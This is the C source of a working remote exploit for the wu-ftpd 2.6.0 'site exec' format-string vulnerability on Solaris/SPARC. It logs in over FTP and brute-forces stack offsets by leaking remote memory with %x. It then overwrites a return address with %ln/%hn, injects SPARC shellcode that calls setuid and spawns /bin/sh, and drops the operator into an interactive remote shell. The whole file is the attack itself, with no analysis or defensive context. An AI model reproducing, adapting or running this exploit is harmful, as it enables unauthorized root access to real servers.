/*
 * BETA1 - wuftpd 2.6.0 remote for solaris/sparc
 *
 * SunOS 5.7 Generic_106541-06 sun4u sparc SUNW,Ultra-5_10
 * [ Using values: offset=ffbeda1c eat=8 align=89 add=ffbedff0 inicio=a1 ]
 * [ Using values: offset=ffbeda8c eat=8 align=89 add=ffbee8d0 inicio=a1 ]
 * 
 * The Dark Raver <darkraver@t0s.org>
 */

#include <stdio.h>
#include <string.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/errno.h>
#include <sys/types.h>
#include <sys/select.h>

int debug=0; // change this if you want output
int force=1;

#define LEN1 120
#define EAT 8
#define TOEIP 0xffbeda1c
#define ALIN 89
#define RETN 0xffbedb50
#define BUFLEN 1024
#define BIGBUF 10000
#define INICIO 0x65

void conectar(char *host);
void term(void);
void mkcode1(void);
void mkbuf(void);
void mkini(void);
void mkalin(void);
void mksh(void);
void status(void);

char code1[LEN1];

// nops + suid + sh
char code2[]=
"";

char code3[]=
"\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6"
"\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6"
"\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6"
"\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6"
"\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6"
"\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6"
"\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6"
"\x82\x10\x20\x17\x90\x20\x60\x17\x92\x22\x40\x09\x91\xd0\x20\x08"
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2b\x0b\xda\xdc\xae\x15\x63\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x10\x20\x10\x94\x22\xa0\x10"
"\x9c\x03\xa0\x14\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8"
"\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f"
"\x82\x10\x20\x01\x91\xd0\x20\x08"
;



// Global variables rulez!!! ;)

int alin=ALIN;
int eat=EAT;
unsigned int toeip=TOEIP;
unsigned int retn=RETN;
char buf[BUFLEN];
int inicio=INICIO;
int opt=1;
int sock;
struct sockaddr_in sa;
struct hostent *hp;

int main(int argc, char *argv[]) {
char mbuf[BIGBUF];
int c;
char *str;
                                                    
while((c = getopt(argc,argv,"df"))!= -1){
	switch (c) {
		case 'd':
			printf("Debug active\n");
			debug=1;
			break;
		case 'f':
			printf("Forcing values\n");
			force=0;
			break;
		}
	}
	
argc-=optind;
argv+=optind;

//printf("%i\n", argc);


if(argc==1) {
printf("Using default values: offset=%x eat=%i align=%i add=%x\n", toeip, eat, alin, retn);
	} else { if(argc!=5) { 
		fprintf(stderr,"Usage: fx <host> [offset] [eat] [align] [address] [-d] [-f]\n");
		exit(0); } 
	}
    	
   
printf("1. Connecting...\n");

if(debug) getchar();

conectar(argv[0]);

printf("2. Calculating eat...\n");

if(debug) getchar();

if(argc>=3) { sscanf(argv[2], "%i", &eat); }
        else { eat=EAT; }

// The real spaghetti coding!!! ;)

if(force) {
eat--;
        
do {
eat++;
memset(code1,0x30,LEN1);

mkalin();

send(sock,buf,strlen(buf),0);

c=recv(sock, mbuf, sizeof(mbuf), 0);
if(debug) puts(mbuf);
str=strchr(mbuf,'|');
if(str==0) {
	printf("Unable to complete search!\n");
	exit(-1); }
str[9]='\x00';

printf("Using eat: %i\n", eat);
printf("<%s>\n\n",str);

if(!(strncmp(str,"|30303030",9))) {
	opt=0; }

memset(mbuf, 0, BIGBUF);

c=recv(sock, mbuf, sizeof(mbuf), 0);
if(debug) puts(mbuf);
memset(mbuf, 0, BIGBUF);

if(debug) getchar();

} while(opt);

opt=1;
}
printf("Eat OK: %i\n", eat);

printf("3. Calculating align...\n");

if(debug) getchar();

if(argc>=4) { sscanf(argv[3], "%i", &alin); }
        else { alin=ALIN; }

if(force) {
alin--;        

do {
alin++;

toeip=0x31313131;

mkcode1();

mkalin();

send(sock,buf,strlen(buf),0);

c=recv(sock, mbuf, sizeof(mbuf), 0);
if(debug) puts(mbuf);
str=strchr(mbuf,'|');
if(str==0) {
        printf("Unable to complete search!\n");
        exit(-1); }
str[9]='\x00';

printf("Using align: %i\n", alin);
printf("<%s>\n\n",str);

if(!(strncmp(str,"|31313131",9))) {
	opt=0; }

memset(mbuf, 0, BIGBUF);

c=recv(sock, mbuf, sizeof(mbuf), 0);
if(debug) puts(mbuf);
memset(mbuf, 0, BIGBUF);

if(debug) getchar();

} while(opt);

opt=1;

toeip=TOEIP;
}
printf("Align OK: %i\n", alin);

printf("4. Calculating inital length...\n");

if(debug) getchar();

if(argc>=2) { sscanf(argv[1], "%x", &toeip); }
	else { toeip=TOEIP; }

if(force) {
mkcode1();

mkini();  
   
send(sock,buf,strlen(buf),0);

c=recv(sock, mbuf, sizeof(mbuf), 0);
if(debug) puts(mbuf);
str=strchr(mbuf,'|');
if(str==0) {
        printf("Unable to complete search!\n");
        exit(-1); }
inicio=str - mbuf - 4;
memset(mbuf, 0, BIGBUF);

c=recv(sock, mbuf, sizeof(mbuf), 0);
if(debug) puts(mbuf);
memset(mbuf, 0, BIGBUF);

if(debug) getchar();
}
printf("Start OK: %x\n", inicio);

// It search in the remote memory!! wow!! :)

printf("5. Searching for shellcode\n");

if(debug) getchar();

if(argc>=5) { sscanf(argv[4], "%x", &retn); }
        else { retn=RETN; }

if(force) {
retn-=0x40;
        
do {
retn+=0x40;

toeip=retn;

mkcode1();

mksh();

if(debug) puts(buf);
send(sock,buf,strlen(buf),0);

c=recv(sock, mbuf, sizeof(mbuf), 0);
if(debug) puts(mbuf);
str=strchr(mbuf,'|');
if(str==0) {
	printf("Unable to complete search!\n");
	exit(-1); }
str[5]='\x00';

printf("Using ret: %x\n", retn);
printf("<%s>\n\n",str);

if(!(strncmp(str,"|\xa6\xa6\xa6\xa6",5))) {
	opt=0; }

memset(mbuf, 0, BIGBUF);

c=recv(sock, mbuf, sizeof(mbuf), 0);
if(debug) puts(mbuf);
memset(mbuf, 0, BIGBUF);

if(debug) getchar();

} while(opt);

opt=1;
}

retn=retn+0x460;

printf("Address of the shellcode OK: %x\n", retn);

printf("6. Sending attack...\n");

if(argc>=2) { sscanf(argv[1], "%x", &toeip); }
 	else { toeip=TOEIP; }

status();

if(debug) getchar();

do {
printf("Using Offset: %x\n", toeip);

mkcode1();

mkbuf();

send(sock,buf,strlen(buf),0);

printf("Waiting for shell...\n\n");

term();

printf("Logged out...\n");

toeip+=4;

if(debug) getchar();

printf("Reconecting...\n");

if(debug) getchar();
close(sock);
fflush(stdout);
conectar(argv[0]);

} while(opt);

printf("Ending...");
if(debug) getchar();
close(sock);
fflush(stdout);
exit(0);
}

void conectar(char *host) {
char cbuf[BUFLEN];
int c;

memset(cbuf, 0, BUFLEN);

if((hp=(struct hostent *)gethostbyname(host))==NULL) {
	perror("gethostbyname()");
	exit(0); }

if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
        perror("socket()");
        exit(0); }

sa.sin_family=AF_INET;
sa.sin_port=htons(21);

memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length);

if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) {
	perror("connect()");
        exit(0); }

printf("Connected to %s\n",host);

printf("Reading...\n");

c=recv(sock, cbuf, sizeof(cbuf), 0);  
if(debug) puts(cbuf);
  
if((strncmp(cbuf, "220 ", 4))==0) { memset(cbuf, 0, BUFLEN); }
	else {
	if((strncmp(cbuf, "220-", 4))==0) {
		memset(cbuf, 0, BUFLEN);
		c=recv(sock, cbuf, sizeof(cbuf), 0);
		if(debug) puts(cbuf);
		memset(cbuf, 0, BUFLEN); }
	else {	 
		printf("Wrong ftp server\n");
		exit(-1); }
	}                                                          

  	                        
printf(">> user upload\n");
sprintf(cbuf,"user upload\n");
write(sock,cbuf,strlen(cbuf));
  
c=recv(sock, cbuf, sizeof(cbuf), 0);
if(debug) puts(cbuf);
  
if(strncmp(cbuf, "331", 3)) {
	printf("Anonymous ftp not allowed\n");
	exit(-1);
	}                                                         

memset(cbuf, 0, BUFLEN);
  
printf(">> pass upload\n", code2);
sprintf(cbuf,"pass upload\n", code2);
write(sock,cbuf,strlen(cbuf));

c=recv(sock, cbuf, sizeof(cbuf), 0);
if(debug) puts(cbuf);
  
if((strncmp(cbuf, "230 ", 4))==0) { memset(cbuf, 0, BUFLEN); }
	else {
	if((strncmp(cbuf, "230-", 4))==0) {
		memset(cbuf, 0, BUFLEN);
		c=recv(sock, cbuf, sizeof(cbuf), 0);
		if(debug) puts(cbuf);
		memset(cbuf, 0, BUFLEN); }
	else {	 
		printf("Wrong password\n");
		exit(-1); }
	}     
	  
printf("Logged\n");

/*printf(">> %s\n", code2);
sprintf(cbuf,"%s\n", code2);
write(sock,cbuf,strlen(cbuf));

c=recv(sock, cbuf, sizeof(cbuf), 0);
if(debug) puts(cbuf);*/

}

void term(void) {
char sbuf[BUFLEN];
fd_set rfds;
int x;

printf("Overwrited...\n");
if(debug) getchar();

sprintf(sbuf, "QUIT\nuname -a; id;\n");
send(sock, sbuf, strlen(sbuf), 0);                

while (1) {
      FD_ZERO(&rfds);
      FD_SET(0, &rfds);
      FD_SET(sock, &rfds);
      
      if(select((0 > sock ? 0 : sock) + 1, &rfds, NULL, NULL, NULL) < 1)
	return;
      
      if(FD_ISSET(sock, &rfds)) {
	  if((x = read(sock, sbuf, sizeof(sbuf))) < 1)
	    return;
	    write(0, sbuf, x);	}

      if(FD_ISSET(0, &rfds)) {
	  if((x = read(0, sbuf, sizeof(sbuf))) < 1)
	    return;
	    write(sock, sbuf, x); }
      }

}

void mkcode1(void) {
int i;
int c;

memset(code1,0x30,LEN1);

i=alin;

for(c=0;c<2;c++) {

  code1[i]=((toeip & 0xff000000) >> 24);
  if(code1[i]=='\xff') {
  	i++;
  	code1[i]=((toeip & 0xff000000) >> 24); }
  i++;
  code1[i]=((toeip & 0xff0000) >> 16);
  if(code1[i]=='\xff') {
        i++;
        code1[i]=((toeip & 0xff0000) >> 16); }                  
  i++;
  code1[i]=((toeip & 0xff00) >> 8);
  if(code1[i]=='\xff') {
  	i++;
  	code1[i]=((toeip & 0xff00) >> 8); }
  i++;
  code1[i]=(toeip & 0xff);
  if(code1[i]=='\xff') {
  	i++;
  	code1[i]=(toeip & 0xff); }

  i=i+5;

}

i=i-4;
code1[i]='\x00';

}

void mkbuf(void) {
char *ptr = buf;
int r1, r2, r3, r4;
int i;

memset(buf, 0, 1024);
  
ptr = &buf[strlen(buf)];

sprintf(ptr, "site exec ");
ptr = &buf[strlen(buf)];

for(i=0; i < LEN1;i++) {
	sprintf(ptr,"%c", code1[i]);
	ptr = &buf[strlen(buf)]; }
        
for(i=0; i < eat - 1; i++) {
	sprintf(ptr, "%%x");
    	ptr = &buf[strlen(buf)]; }  

r1 = (retn & 0x0000ffff);
sprintf(ptr,"%%.%.5dx", r1 - inicio);
ptr = &buf[strlen(buf)];
//sprintf(ptr,"%%x");
sprintf(ptr,"%%ln"); 
ptr = &buf[strlen(buf)];

r2 = ((retn & 0xffff0000) >> 16);
sprintf(ptr,"%%.%.5dx", r2 - r1 + 8);
ptr = &buf[strlen(buf)];
//sprintf(ptr,"%%x");
sprintf(ptr,"%%hn");
ptr = &buf[strlen(buf)];

sprintf(ptr,"%s",code3);
ptr = &buf[strlen(buf)];

sprintf(ptr,"\n");

}

void mkini(void) {
char *ptr = buf;
int i;

memset(buf, 0, 1024);
  
ptr = &buf[strlen(buf)];

sprintf(ptr, "site exec ");
ptr = &buf[strlen(buf)];

for(i=0; i < LEN1;i++) {
	sprintf(ptr,"%c", code1[i]);
	ptr = &buf[strlen(buf)]; }
        
for(i=0; i < eat; i++) {
	sprintf(ptr, "%%x");
    	ptr = &buf[strlen(buf)]; }  

sprintf(ptr,"|");
ptr = &buf[strlen(buf)];

sprintf(ptr,"%%x"); 
ptr = &buf[strlen(buf)];

sprintf(ptr,"\n");

}

void mkalin() {
char *ptr = buf;
int i;

memset(buf, 0, 1024);
  
ptr = &buf[strlen(buf)];

sprintf(ptr, "site exec ");
ptr = &buf[strlen(buf)];

for(i=0; i < LEN1;i++) {
	sprintf(ptr,"%c", code1[i]);
	ptr = &buf[strlen(buf)]; }
        
for(i=0; i < eat; i++) {
	sprintf(ptr, "%%x");
    	ptr = &buf[strlen(buf)]; }  

sprintf(ptr,"|");
ptr = &buf[strlen(buf)];
	
sprintf(ptr,"%%x");
ptr = &buf[strlen(buf)];

sprintf(ptr,"\n");

}

void mksh(void) {
char *ptr = buf;
int r1, r2, r3, r4;
int i;

memset(buf, 0, 1024);
  
ptr = &buf[strlen(buf)];

sprintf(ptr, "site exec ");
ptr = &buf[strlen(buf)];

for(i=0; i < LEN1;i++) {
	sprintf(ptr,"%c", code1[i]);
	ptr = &buf[strlen(buf)]; }
        
for(i=0; i < eat - 1; i++) {
	sprintf(ptr, "%%x");
    	ptr = &buf[strlen(buf)]; }  

sprintf(ptr,"%%.%.5dx", 8);
ptr = &buf[strlen(buf)];
sprintf(ptr,"|%%s -"); 
ptr = &buf[strlen(buf)];

sprintf(ptr,"%s",code3);
ptr = &buf[strlen(buf)];

sprintf(ptr,"\n");

}

void status(void){
printf("[ Using values: offset=%x eat=%i align=%i add=%x inicio=%x ]\n",
toeip, eat, alin, retn, inicio);
}

// By The Dark Raver